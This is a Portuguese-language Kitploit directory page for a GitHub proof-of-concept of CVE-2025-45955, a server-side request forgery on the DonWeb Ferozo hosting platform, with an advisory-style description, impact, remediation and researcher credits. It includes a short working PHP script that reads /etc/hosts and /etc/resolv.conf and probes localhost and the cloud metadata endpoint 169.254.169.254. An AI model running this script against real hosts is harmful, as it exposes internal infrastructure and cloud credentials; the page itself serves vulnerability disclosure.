Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-45955 — Exploit de prova de conceito para CVE-2025-45955 demonstrando Server-Side Request Forgery (SSRF) na plataforma de hospedagem DonWeb Ferozo, permitindo mapeamento de infraestrutura interna e enumeração de metadados da nuvem. | Kitploit
Ferramentas/GitHubGitHub/surendrapuppala7/cve-2025-45955
ReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebSegurança na Nuvem
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

Exploit de prova de conceito para CVE-2025-45955 demonstrando Server-Side Request Forgery (SSRF) na plataforma de hospedagem DonWeb Ferozo, permitindo mapeamento de infraestrutura interna e enumeração de metadados da nuvem.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 7 mesesAinda não revisado

CVE-2025-45955

Falsificação de Requisição no Lado do Servidor no DonWeb Ferozo (CVE-2025-45955)

Descrição

Um atacante pode explorar esta vulnerabilidade enviando e executando um arquivo PHP especialmente criado na plataforma de hospedagem Ferozo. Quando acessado, o arquivo inicia uma série de tentativas de SSRF visando serviços internos (como 127.0.0.1, 169.254.169.254, ou endpoints de malha de serviço), arquivos locais (ex.: file:///etc/passwd), e endpoints de metadados de nuvem conhecidos. O script coleta respostas ou mensagens de erro, permitindo que o atacante mapeie a infraestrutura interna, enumere serviços acessíveis e reúna informações sensíveis para exploração posterior.

Prova de Conceito (PoC)

O código a seguir demonstra a vulnerabilidade:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

Componente Afetado

  • Plataforma de Hospedagem Ferozo (DonWeb)
  • Ambientes baseados em PHP que permitem upload ou execução de arquivos PHP controlados pelo usuário

Impacto

  • Divulgação de Informações: Vaza IPs internos, conteúdos de arquivos, endpoints de metadados de nuvem
  • Reconhecimento de Infraestrutura: Permite enumeração de portas e serviços (Docker, Kubelet, etc.)
  • Potencial de Exploração em Nuvem: Sonda endpoints de metadados conhecidos como AWS, GCP e Alibaba
  • Oportunidade de Encadeamento: Pode ser combinado com outras vulnerabilidades locais para RCE ou pivoteamento

Remediação

  • Restrinja funções de inclusão de arquivos e acesso a URL (file_get_contents, fopen, etc.)
  • Bloqueie o acesso a intervalos de IP internos (127.0.0.0/8, 169.254.169.254, etc.) por meio de regras de firewall de saída
  • Audite e sanitize entradas do usuário que possam influenciar caminhos de arquivos ou URLs

ID do CVE

CVE-2025-45955


Descobridor

Reportado por [Facundo Fernandez, Jinook Kim, Surendra Puppala / Pesquisadores de Segurança | @BYU]

Baixar ferramenta